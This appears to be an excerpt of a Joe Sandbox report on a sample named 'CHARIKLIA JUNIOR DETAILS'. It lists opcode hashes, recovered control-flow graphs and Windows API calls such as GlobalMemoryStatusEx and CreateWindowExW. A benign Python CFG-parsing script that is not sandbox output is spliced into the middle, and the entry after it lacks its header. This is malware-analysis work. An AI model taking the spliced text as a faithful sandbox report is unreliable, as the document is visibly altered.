                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dfbe4bd3316972369dcec62a086cc15f9f90d8f3bd5360c038b6613653170a5a
                                                              • Instruction ID: 83301c4df2cee7545581c76bdc0689d9a0a62539f446c753aa7f54e93c9b8a5c
                                                              • Opcode Fuzzy Hash: dfbe4bd3316972369dcec62a086cc15f9f90d8f3bd5360c038b6613653170a5a
                                                              • Instruction Fuzzy Hash: 7502AD30B1121ACFDB54DB69E854AAEB7F2FF88210F118529D905DB350DB76EC82CB91

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 06DE28F6
                                                              • GetCurrentThread.KERNEL32 ref: 06DE2933
                                                              • GetCurrentProcess.KERNEL32 ref: 06DE2970
                                                              • GetCurrentThreadId.KERNEL32 ref: 06DE29C9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: a7660d91497337970a7b4602b8b16c61e62bc28407479a1e07411ae2f10ddb58
                                                              • Instruction ID: 09e76945f1bce61a40de26addcd6e91e63785fd9be6868fe69c42eeb7b89ff70
                                                              • Opcode Fuzzy Hash: a7660d91497337970a7b4602b8b16c61e62bc28407479a1e07411ae2f10ddb58
                                                              • Instruction Fuzzy Hash: 865167B0901349CFDB44EFAAD948BAEBBF1BF88314F208419E409A73A0D7755944CF65

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 06DE28F6
                                                              • GetCurrentThread.KERNEL32 ref: 06DE2933
                                                              • GetCurrentProcess.KERNEL32 ref: 06DE2970
                                                              • GetCurrentThreadId.KERNEL32 ref: 06DE29C9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 87f81d86737f67d27f19b68bf5a1564f41b373c302b6c32fc7ebbf86e325deee
                                                              • Instruction ID: bb37f34ebaf02e358572a8340d4ea27f777a37a902d165ee2f00d8ec4d0c7ff1
                                                              • Opcode Fuzzy Hash: 87f81d86737f67d27f19b68bf5a1564f41b373c302b6c32fc7ebbf86e325deee
                                                              • Instruction Fuzzy Hash: A05166B09013498FDB44EFAAD948B9EBBF5FF88314F208019E409A73A0DB756944CF65

                                                              Control-flow Graph

                                                              control_flow_graph 844 6deaf10-6deaf2f 846 6deaf5b-6deaf5f 844->846 847 6deaf31-6deaf3e call 6dea2e4 844->847 849 6deaf73-6deafb4 846->849 850 6deaf61-6deaf6b 846->850 852 6deaf54 847->852 853 6deaf40 847->853 856 6deafb6-6deafbe 849->856 857 6deafc1-6deafcf 849->857 850->849 852->846 901 6deaf46 call 6deb1b8 853->901 902 6deaf46 call 6deb1a9 853->902 856->857 858 6deaff3-6deaff5 857->858 859 6deafd1-6deafd6 857->859 864 6deaff8-6deafff 858->864 861 6deafd8-6deafdf call 6dea2f0 859->861 862 6deafe1 859->862 860 6deaf4c-6deaf4e 860->852 863 6deb090-6deb150 860->863 866 6deafe3-6deaff1 861->866 862->866 896 6deb158-6deb183 GetModuleHandleW 863->896 897 6deb152-6deb155 863->897 867 6deb00c-6deb013 864->867 868 6deb001-6deb009 864->868 866->864 870 6deb015-6deb01d 867->870 871 6deb020-6deb029 call 6de348c 867->871 868->867 870->871 876 6deb02b-6deb033 871->876 877 6deb036-6deb03b 871->877 876->877 878 6deb03d-6deb044 877->878 879 6deb059-6deb066 877->879 878->879 881 6deb046-6deb056 call 6de8900 call 6dea300 878->881 886 6deb068-6deb086 879->886 887 6deb089-6deb08f 879->887 881->879 886->887 898 6deb18c-6deb1a0 896->898 899 6deb185-6deb18b 896->899 897->896 899->898 901->860 902->860
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 06DEB176
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 47d0a3d1887abee22388ad8f7e3a96e1f2e455346f7c2cee7d3eae1b4c6d9f23
                                                              • Instruction ID: 97e54688fc77aee86d3ad1ccf0731c72d22d50566c4b234ad0458907bfd4b9d9
                                                              • Opcode Fuzzy Hash: 47d0a3d1887abee22388ad8f7e3a96e1f2e455346f7c2cee7d3eae1b4c6d9f23
                                                              • Instruction Fuzzy Hash: 4E8168B0A00B068FD764EF6AD54475ABBF1FF88200F04892EE49AD7A50D775F845CBA1

                                                              Control-flow Graph

                                                              control_flow_graph 1003 6ded0e4-6ded156 1005 6ded158-6ded15e 1003->1005 1006 6ded161-6ded168 1003->1006 1005->1006 1007 6ded16a-6ded170 1006->1007 1008 6ded173-6ded1ab 1006->1008 1007->1008 1009 6ded1b3-6ded212 CreateWindowExW 1008->1009 1010 6ded21b-6ded253 1009->1010 1011 6ded214-6ded21a 1009->1011 1015 6ded255-6ded258 1010->1015 1016 6ded260 1010->1016 1011->1010 1015->1016 1017 6ded261 1016->1017 1017->1017
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06DED202
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 4e884979985a47efbded1fda4f402e0f1fb489c9cca32ce302468d7079fac372
                                                              • Instruction ID: be4af9ac9a12d8d666bd3341f56e770bb7617c32cf4bd312ed5145cf5e15df24
                                                              • Opcode Fuzzy Hash: 4e884979985a47efbded1fda4f402e0f1fb489c9cca32ce302468d7079fac372
                                                              • Instruction Fuzzy Hash: 4051C1B1D0034DDFDB14DFA9C884ADEBBB6BF88310F64812AE819AB210D7759945CF90

                                                              Control-flow Graph

                                                              control_flow_graph 1018 6ded0f0-6ded156 1019 6ded158-6ded15e 1018->1019 1020 6ded161-6ded168 1018->1020 1019->1020 1021 6ded16a-6ded170 1020->1021 1022 6ded173-6ded212 CreateWindowExW 1020->1022 1021->1022 1024 6ded21b-6ded253 1022->1024 1025 6ded214-6ded21a 1022->1025 1029 6ded255-6ded258 1024->1029 1030 6ded260 1024->1030 1025->1024 1029->1030 1031 6ded261 1030->1031 1031->1031
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06DED202
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 4377a61a5cc79efec04c64486e323e57092e07f6ef1c2f1470afc37d22ec6555
                                                              • Instruction ID: 2335327a95489f51134bb2c0e3d059c36d9d75ee159ca7af37d185cbcd029b0d
                                                              • Opcode Fuzzy Hash: 4377a61a5cc79efec04c64486e323e57092e07f6ef1c2f1470afc37d22ec6555
                                                              • Instruction Fuzzy Hash: 7B41B1B1D00309DFDB14DF99C884ADEBBB6BF88310F64812AE819AB250DB759845CF90

                                                              Control-flow Graph

                                                              control_flow_graph 1032 6dea5ec-6def86c 1035 6def91c-6def93c call 6dea4c4 1032->1035 1036 6def872-6def877 1032->1036 1043 6def93f-6def94c 1035->1043 1038 6def8ca-6def902 CallWindowProcW 1036->1038 1039 6def879-6def8b0 1036->1039 1040 6def90b-6def91a 1038->1040 1041 6def904-6def90a 1038->1041 1046 6def8b9-6def8c8 1039->1046 1047 6def8b2-6def8b8 1039->1047 1040->1043 1041->1040 1046->1043 1047->1046
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 06DEF8F1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: 8ae5d2111546711de96032d313d15119b1f092de7e0934bf78432e0a8d1a5f8b
                                                              • Instruction ID: cfd3d022ed4fcd20bf194b6998d8a361422cddfe754a47c8a8d56dacea757b60
                                                              • Opcode Fuzzy Hash: 8ae5d2111546711de96032d313d15119b1f092de7e0934bf78432e0a8d1a5f8b
                                                              • Instruction Fuzzy Hash: 32415AB4900709DFDB54EF99C888AAABBF5FB88314F258459D459A7321D734A841CFA0

                                                              Control-flow Graph

                                                              control_flow_graph 1049 6de2ab8-6de2b54 DuplicateHandle 1050 6de2b5d-6de2b7a 1049->1050 1051 6de2b56-6de2b5c 1049->1051 1051->1050
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06DE2B47
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: ab8c04eecdd51c5855f863062a089435c2a9e1f4b22f0931da3df5acd449f435
                                                              • Instruction ID: 8f9249d1b6eac7b675daeb65b0ea4479c477330e22e06e15e3f64912c51a57ae
                                                              • Opcode Fuzzy Hash: ab8c04eecdd51c5855f863062a089435c2a9e1f4b22f0931da3df5acd449f435
                                                              • Instruction Fuzzy Hash: EF21E4B5D00249DFDB10CFAAD884ADEBBF5FB48310F14841AE914A7350D378A951CFA4

                                                              Control-flow Graph

                                                              control_flow_graph 1054 6de2ac0-6de2b54 DuplicateHandle 1055 6de2b5d-6de2b7a 1054->1055 1056 6de2b56-6de2b5c 1054->1056 1056->1055
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06DE2B47
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 2877829976bbca19def1c45ed576decf9bbe570896400fc658d20ecaf7792f3f
                                                              • Instruction ID: ad496f8e93b2ddfba1670c6aa69276febefc235effe03e11606eb10cbe5a01e5
                                                              • Opcode Fuzzy Hash: 2877829976bbca19def1c45ed576decf9bbe570896400fc658d20ecaf7792f3f
                                                              • Instruction Fuzzy Hash: F221E4B5D002099FDB10CFAAD884ADEFBF9FB48310F14801AE914A3350D378A940CFA4

                                                              Control-flow Graph

                                                              control_flow_graph 1059 2f2eb1f-2f2eb76 1061 2f2eb7e-2f2ebac GlobalMemoryStatusEx 1059->1061 1062 2f2ebb5-2f2ebdd 1061->1062 1063 2f2ebae-2f2ebb4 1061->1063 1063->1062
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 02F2EB9F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3861220439.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2f20000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: 28d5027407f91d16220816587f380feeca1507cf98d0a11a73434d31307b157a
                                                              • Instruction ID: 6b5009b5e197460d74e54d733f91db76b420857566c49e9ee46ad1578205442f
                                                              • Opcode Fuzzy Hash: 28d5027407f91d16220816587f380feeca1507cf98d0a11a73434d31307b157a
                                                              • Instruction Fuzzy Hash: C32133B1C0126A9FDB10CFAAC54579EFBF4BF49220F14816AD918B7240D378A905CFA5

                                                              Control-flow Graph

                                                              control_flow_graph 1066 2f2eb38-2f2ebac GlobalMemoryStatusEx 1068 2f2ebb5-2f2ebdd 1066->1068 1069 2f2ebae-2f2ebb4 1066->1069 1069->1068
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 02F2EB9F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3861220439.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2f20000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: bc9e7a46f73f39ddc67d9eab3c3d6a7a33a63c5da4e2bfb9a39996b541121103
                                                              • Instruction ID: 0124964fa0de43658fc0f0ba12e9b1dd58c375cde10ceee5b2dd5e02eefc5618
                                                              • Opcode Fuzzy Hash: bc9e7a46f73f39ddc67d9eab3c3d6a7a33a63c5da4e2bfb9a39996b541121103
                                                              • Instruction Fuzzy Hash: 471120B1C0066A9FDB10DFAAC444BDEFBF4BF48720F10816AD918A7240D378A944CFA5
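The control_flow_graph lines in the entries above are Joe Sandbox's text rendering of each recovered function's basic-block graph. The script below is an added example, not Joe Sandbox code and not code from the sample: it parses that rendering and reports, per graph, the entry block, the block that invokes the listed Windows API together with the blocks control reaches afterwards, any self-loops, and any blocks not reachable from the entry. The token grammar it assumes (block id followed by a hex address or address range, `call <addr>` for an intra-module call, a bare name for a Windows API, `a->b` for an edge) is inferred from the listing itself rather than from any Joe Sandbox documentation. The two sample graphs are copied from the DuplicateHandle and CreateWindowExW entries above.

```python
"""Parse the text form of a Joe Sandbox control-flow graph into basic
blocks and edges, then answer the questions an analyst usually asks of it:
which block calls which Windows API, where control goes afterwards, and
whether the function contains self-loops or unreachable blocks.

Format assumed (inferred from the report listing, not documented):
  <id> <start>[-<end>]   a basic block, addresses in hex
  call <addr>            an intra-module call made from the current block
  <Name>                 a Windows API invoked by the current block
  <a>-><b>               a directed edge between block ids
"""
import re
from collections import deque
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ID_RE = re.compile(r"^\d+$")


@dataclass
class Block:
    node_id: int
    start: int
    end: int
    apis: list = field(default_factory=list)   # Windows APIs invoked here
    calls: list = field(default_factory=list)  # intra-module callee addresses


def parse_cfg(line):
    """Return (blocks, edges) for one control_flow_graph line."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif ID_RE.match(tok):
            # A block id is always followed by its address or address range.
            lo, _, hi = tokens[i + 1].partition("-")
            start = int(lo, 16)
            current = Block(int(tok), start, int(hi, 16) if hi else start)
            blocks[current.node_id] = current
            i += 2
        elif tok == "call":
            current.calls.append(int(tokens[i + 1], 16))
            i += 2
        else:
            current.apis.append(tok)
            i += 1
    return blocks, edges


def successors(edges, node_id):
    return sorted(b for a, b in edges if a == node_id)


def entry_blocks(blocks, edges):
    """Blocks with no incoming edge; a well-formed function has exactly one."""
    targets = {b for _, b in edges}
    return sorted(n for n in blocks if n not in targets)


def self_loops(edges):
    return sorted(a for a, b in edges if a == b)


def reachable(blocks, edges, start):
    seen, todo = set(), deque([start])
    while todo:
        n = todo.popleft()
        if n in seen:
            continue
        seen.add(n)
        todo.extend(successors(edges, n))
    return seen


def api_call_sites(blocks, edges):
    """Map each API name to (block id, block start, successor ids)."""
    sites = {}
    for blk in blocks.values():
        for api in blk.apis:
            sites.setdefault(api, []).append(
                (blk.node_id, hex(blk.start), successors(edges, blk.node_id)))
    return sites


def summarize(line):
    blocks, edges = parse_cfg(line)
    entries = entry_blocks(blocks, edges)
    unreachable = sorted(set(blocks) - reachable(blocks, edges, entries[0]))
    return {
        "blocks": len(blocks),
        "edges": len(edges),
        "entry": entries,
        "apis": api_call_sites(blocks, edges),
        "self_loops": self_loops(edges),
        "unreachable": unreachable,
    }


# Sample input: the DuplicateHandle and CreateWindowExW graphs copied
# verbatim from the report entries above.
DUP_HANDLE_CFG = ("control_flow_graph 1049 6de2ab8-6de2b54 DuplicateHandle "
                  "1050 6de2b5d-6de2b7a 1049->1050 1051 6de2b56-6de2b5c "
                  "1049->1051 1051->1050")
CREATE_WINDOW_CFG = ("control_flow_graph 1003 6ded0e4-6ded156 1005 6ded158-6ded15e "
                     "1003->1005 1006 6ded161-6ded168 1003->1006 1005->1006 "
                     "1007 6ded16a-6ded170 1006->1007 1008 6ded173-6ded1ab "
                     "1006->1008 1007->1008 1009 6ded1b3-6ded212 CreateWindowExW "
                     "1008->1009 1010 6ded21b-6ded253 1009->1010 1011 6ded214-6ded21a "
                     "1009->1011 1015 6ded255-6ded258 1010->1015 1016 6ded260 "
                     "1010->1016 1011->1010 1015->1016 1017 6ded261 1016->1017 "
                     "1017->1017")

if __name__ == "__main__":
    for name, cfg in (("DuplicateHandle", DUP_HANDLE_CFG),
                      ("CreateWindowExW", CREATE_WINDOW_CFG)):
        print(name, summarize(cfg))
```

Run against the two graphs it reports that the API-calling block has two successors in each case (1049 to 1050 and 1051; 1009 to 1010 and 1011), the shape the listing shows for a return-value check after the call, and that the CreateWindowExW function ends in block 1017 branching to itself. Any control_flow_graph line from this report, including the long one at the top of this section, can be passed to summarize() unchanged.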
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 06DEB176
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866058732.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6de0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 0973ee971f5f65e6ce47ff530a438948857084d9234364d3ad9dfb6a6b3acd3e
                                                              • Instruction ID: fec3ce17f06f4bde0d830e299feca1db6983009b0c1f3cf2a57543491a48bb93
                                                              • Opcode Fuzzy Hash: 0973ee971f5f65e6ce47ff530a438948857084d9234364d3ad9dfb6a6b3acd3e
                                                              • Instruction Fuzzy Hash: EF1110B5C003498FDB10DF9AC944BDEFBF4EB88220F10841AD429A7210C379A545CFA5
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d94f95d899a580a37235096387a3fb4f0146432425b43bba091a6f0347f5eb8
                                                              • Instruction ID: 29e428f4fc67117e8a56775dba12fcf11015b022347a0a4b62b748be5219d03c
                                                              • Opcode Fuzzy Hash: 5d94f95d899a580a37235096387a3fb4f0146432425b43bba091a6f0347f5eb8
                                                              • Instruction Fuzzy Hash: C7627F30B1031A8FCB55EB69E580A5DBBF2FF84700B218629D4059F35ADB75EC86CB81
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c32b62cbc4ec11088134c55e00b6b578ab01c0d3f1230c46fbd1d5ccdbb9f1a6
                                                              • Instruction ID: 93c543ce9727040244a85bccd118ca1a4de39d5874251286a84ef05e9dff31a1
                                                              • Opcode Fuzzy Hash: c32b62cbc4ec11088134c55e00b6b578ab01c0d3f1230c46fbd1d5ccdbb9f1a6
                                                              • Instruction Fuzzy Hash: C5A1A570F201098FEF64DB6CD4907AEBAA6FB89310F658426E505EB391CF39DC819B51
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c64280f042fdd4ceb2d0740be743d3ef44fd7b7e949e496cd2d34e6de64e771
                                                              • Instruction ID: 997fc1fd10a0a4410e9a265ad6fa75f41e4471e1de58d8dc5071a4ce6fae7276
                                                              • Opcode Fuzzy Hash: 5c64280f042fdd4ceb2d0740be743d3ef44fd7b7e949e496cd2d34e6de64e771
                                                              • Instruction Fuzzy Hash: AF915F70F1021ACFDB94DB69D8607AEB7F6EFC9200F108569C9099B344EE359D86CB91
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a9db060a86ce7c80a941fd82001d62cec5a2a4b5457e8892570d0769c34c9ab1
                                                              • Instruction ID: 0e458739b76c8cf9fef1192cf68737a3a49e4bfc4e2139553b03a9a2813605f0
                                                              • Opcode Fuzzy Hash: a9db060a86ce7c80a941fd82001d62cec5a2a4b5457e8892570d0769c34c9ab1
                                                              • Instruction Fuzzy Hash: E861C371F101214BDF64AB7EC880A5EBADBEFC4610B15443AD90ADB3A0DE66EC4287D5
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fccf38c906782486fab90fad3bf33bbf88218b09d0b2c10c8808e2505810686a
                                                              • Instruction ID: 8f1d605ceb7d4902d2ce5ac8f4d175b907b1238b5afe3fb496a8dc25534bf7af
                                                              • Opcode Fuzzy Hash: fccf38c906782486fab90fad3bf33bbf88218b09d0b2c10c8808e2505810686a
                                                              • Instruction Fuzzy Hash: F4813C30B112098BDF54DFA8D4547AEBBF6AF89300F118529D90AEB395EF35DC428B51
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e981cb6839a5da36e91d688f977d7f78e6a2f3c539ba5640e776fdea0f61ce1
                                                              • Instruction ID: 43acc58d8246e0454c8c76815bdcd1be6e5a2c21ea19e4b209c4a11e89b99544
                                                              • Opcode Fuzzy Hash: 3e981cb6839a5da36e91d688f977d7f78e6a2f3c539ba5640e776fdea0f61ce1
                                                              • Instruction Fuzzy Hash: C2812C30B112098BDF54DFA8D45476EBBF6AF89300F218529D90AEB395EF35DC428B51
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e6a20e02a7a05c5dbc04d8342f3bb31360c6f7eebf5efc6b936633f8c2942fe
                                                              • Instruction ID: d07fb30b8e00170429fffe9262e4b406f74e0d013bceaaf271a251dc4e063916
                                                              • Opcode Fuzzy Hash: 2e6a20e02a7a05c5dbc04d8342f3bb31360c6f7eebf5efc6b936633f8c2942fe
                                                              • Instruction Fuzzy Hash: 95914E30E1021A8BDF60DF68C890B9DB7B1FF89310F208699D549BB355DB71A985CF91
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 56c460a72fd24c2dfe961a01617173327a34034af48a04612ed404312386288c
                                                              • Instruction ID: 1ded7f3f265219b782287878150f5611c903a9b3bf46cd3ec3f5aa20db006504
                                                              • Opcode Fuzzy Hash: 56c460a72fd24c2dfe961a01617173327a34034af48a04612ed404312386288c
                                                              • Instruction Fuzzy Hash: B7715C70E1071ACFDB54DFA9D49069EB7B2FF85200F11852AE909AB354EB759846CB80
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 092cd4600e0c109541ef0ea4f67067eaa3b072ef734ee7b8d13bcba5421eb15e
                                                              • Instruction ID: 08ccfffa08132069fa8a3a806a6edb88ee914f4f89ba1e1fa78b16b5392421eb
                                                              • Opcode Fuzzy Hash: 092cd4600e0c109541ef0ea4f67067eaa3b072ef734ee7b8d13bcba5421eb15e
                                                              • Instruction Fuzzy Hash: A2913E30E106198BDF60DF68C890B9EB7B1FF89310F208699D549BB355DB71AA85CF90
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 60393968409899accd120497e32b6143409230c278fe3dd78d0ba8f199457039
                                                              • Instruction ID: 0de548fc04728c46c840c4c4135c99dda48eb22dff1d200415439f72ff00dbb8
                                                              • Opcode Fuzzy Hash: 60393968409899accd120497e32b6143409230c278fe3dd78d0ba8f199457039
                                                              • Instruction Fuzzy Hash: 74714830A112099FDB54EFA9D980A9EBBF6FF88300F258429D505EB365DB30ED46CB50
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e38edc18de328733daffe3835e19a84367de32f4376d22ea769e882df32ff5f5
                                                              • Instruction ID: 4b52f6c354b8d3840e5091558dbbbf5bab30630cceeffbff482688280fe7e37c
                                                              • Opcode Fuzzy Hash: e38edc18de328733daffe3835e19a84367de32f4376d22ea769e882df32ff5f5
                                                              • Instruction Fuzzy Hash: A761E431F20119DFDF549F78E8846AEB7B2EF84311F12886AE606DB351DB358955CB80
                                                              Memory Dump Source
